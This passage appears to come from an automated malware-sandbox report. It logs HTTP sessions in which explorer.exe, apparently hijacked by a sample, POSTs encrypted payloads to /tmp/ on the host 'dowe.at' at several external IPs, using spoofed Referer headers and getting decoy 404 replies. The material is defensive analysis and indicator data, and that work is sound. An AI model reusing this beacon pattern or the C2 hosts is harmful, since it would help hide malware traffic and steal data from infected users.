                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            30192.168.2.649754201.124.230.180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:58.278934956 CET4815OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://papeicwkil.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 355
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:58.280477047 CET4815OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 27 2c aa 9c
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu',zfe90j?FLb2+xFXCQ5RrSd2=3.8_NX9OUG"`+DE64_}
                                                            Nov 30, 2022 00:11:59.230812073 CET4816INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:58 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            31192.168.2.649755200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:59.500617027 CET4817OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://csplko.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 286
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:59.500617027 CET4817OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 2a 4e bb 89
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu*N:Fx%PZ0~*g3f79@;W+^6msu<QcJ5&!H0S;-.'Uo#W"KTn-6
                                                            Nov 30, 2022 00:12:00.352895975 CET4818INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:59 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            32192.168.2.649756200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:12:00.624742031 CET4819OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ecwfh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 266
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:12:00.626914978 CET4819OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 4f 0b ce 81
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuOg>xm8~vfjj8UOR$'+YZNMy}[Nyr8_Qj<Guxl3<8H2vSYx_Y*n<=6
                                                            Nov 30, 2022 00:12:01.500219107 CET4820INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:12:01 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            33192.168.2.649757211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:12:01.834208965 CET4821OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://avfvrfo.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 289
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:12:01.834239006 CET4821OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 6f 22 c6 bb
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuo"xJQZVd!xTb-C^ib\0NB77LizK>NyYCeqvENn-l Evx~"[[i
                                                            Nov 30, 2022 00:12:03.457660913 CET4822INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:12:02 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 0
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            34192.168.2.649758211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:12:03.782768965 CET4823OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ouqhut.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 235
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:12:03.782977104 CET4823OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5e 02 c7 eb
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu^HmA)f8trAi;\ToxQ@Um(-E*w.,U29qaX(F#7sGYL(<psN
                                                            Nov 30, 2022 00:12:04.990518093 CET4824INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:12:04 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            35192.168.2.649759211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:12:06.007128954 CET4825OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://amjtlofw.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 356
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:12:06.007268906 CET4825OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 59 41 f8 8f
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuYAoWg<7EPNudaS~|~T0HPPIh1*K#)I1L%FM6D@!_pk.{Z%C4]%fx
                                                            Nov 30, 2022 00:12:07.220952988 CET4826INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:12:06 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            36192.168.2.649760200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:12:08.152627945 CET4827OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mrgphm.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 339
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:12:08.152676105 CET4827OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 5a 43 e7 ae
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuZCL8EdV~3~o|8ZY71K2KUw(32{5S\\7I-RrVWY|zFHMcd`:La
                                                            Nov 30, 2022 00:12:09.011964083 CET4828INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:12:08 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.649723200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:03.812041044 CET294OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://yfupv.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 253
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:03.813934088 CET294OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 31 4c d4 92
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu1LJmYyk/+W@q:yT<ZS+!'DRZSr[@E<!b$7*o6,^.b+*P1mkV*
                                                            Nov 30, 2022 00:11:04.692003965 CET295INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:04 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.649724211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:05.019576073 CET296OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lawtvrqx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 250
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:05.019609928 CET296OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2f 3d fa ed
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vu/=:c%?3`)JKf#7:8:)+U%.?tiH @'yPH|,|onhR^bC{^r
                                                            Nov 30, 2022 00:11:06.213625908 CET297INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:05 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
